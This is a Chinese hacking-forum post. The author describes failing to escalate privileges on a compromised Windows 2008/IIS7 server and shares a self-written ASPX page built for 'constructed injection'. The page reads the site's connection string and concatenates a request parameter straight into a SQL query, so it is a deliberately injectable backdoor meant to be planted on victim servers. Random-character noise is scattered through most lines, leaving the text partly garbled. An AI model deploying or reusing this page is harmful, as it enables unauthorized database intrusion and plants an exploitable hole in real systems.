昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。 @$ v W3 d2 n; {* A* Q
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。8 j3 b0 f/ M8 ]5 K. o% w. l
代码量不多,自己写个拉倒了。烦死了。4 \, h" ~7 S/ d& h7 ? b; |
7 e8 n6 X' B6 O8 Y/ I
l3 G0 v2 f7 o0 \; K' J& Z `8 x<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
" K% ~8 \, z! E2 v0 v0 ]<html xmlns="http://www.w3.org/1999/xhtml"> ]8 H) V1 V3 ^6 i; E. u! Z
<head runat="server"> C3 g& q! o9 P, q2 Q
<title>暗影aspx构造注射专用页面</title>) c# F( s7 u6 s' r. w: A
</head> P& ?, J; v& J0 y# w! n
<body>
4 b% Y i1 b {" l. w7 | <form id="form1" runat="server">
$ T& t" {6 j! V0 X6 x) z <div>
, ~) f* b% y+ O- g) `( |! X1 x) L <script language="c#" runat="server">
" \- P% d1 Y. R1 F 0 X# Q' f+ h& @3 K% y8 t
void page_init(object sender, EventArgs e)
' ]5 q; A! [2 t8 y1 B {: ]( E$ r' {5 f2 H+ b. M
( }5 m. `6 x. Y8 V5 v) K) V, G0 Z System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();* g7 o# l1 Z. Q
/ @" J V% C0 J% ^# T5 U+ v
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
3 F3 m/ F0 H5 n2 Y7 G0 E1 }! X1 k" D8 L conn.Open();
) _8 b( V9 f' r9 _( p * b7 E( J3 p. d8 a* O
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=13 v7 o; q3 r9 U3 e$ |( F/ h
* _, N+ D3 \9 B8 c! F% T
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
8 W" ?* I% @6 R$ l5 V6 h' O- \# D7 v int x = command.ExecuteNonQuery(); H9 T) c$ }6 d8 h7 w% X9 d( q6 S
Response.Write(i+"\n");! q2 ]) G, Q2 o
Response.Write(x);) W' I1 _, p1 g% E) g% t: _
conn.Close();6 w2 b i, M5 ]5 G, n! F* {4 u
}
' J$ a! \( s9 s# S * F' U; Q" Q" _ N7 p4 I; o
</script>+ H9 `) ^$ ^& s5 h5 h
</div>0 K4 _( s, {0 K6 `" y" ~
</form>
% A) n& w- u- L# |8 Y- J</body>
7 e3 Q4 @ C! w$ \</html>
) u% D! Q6 {3 X9 f" x$ ?9 a |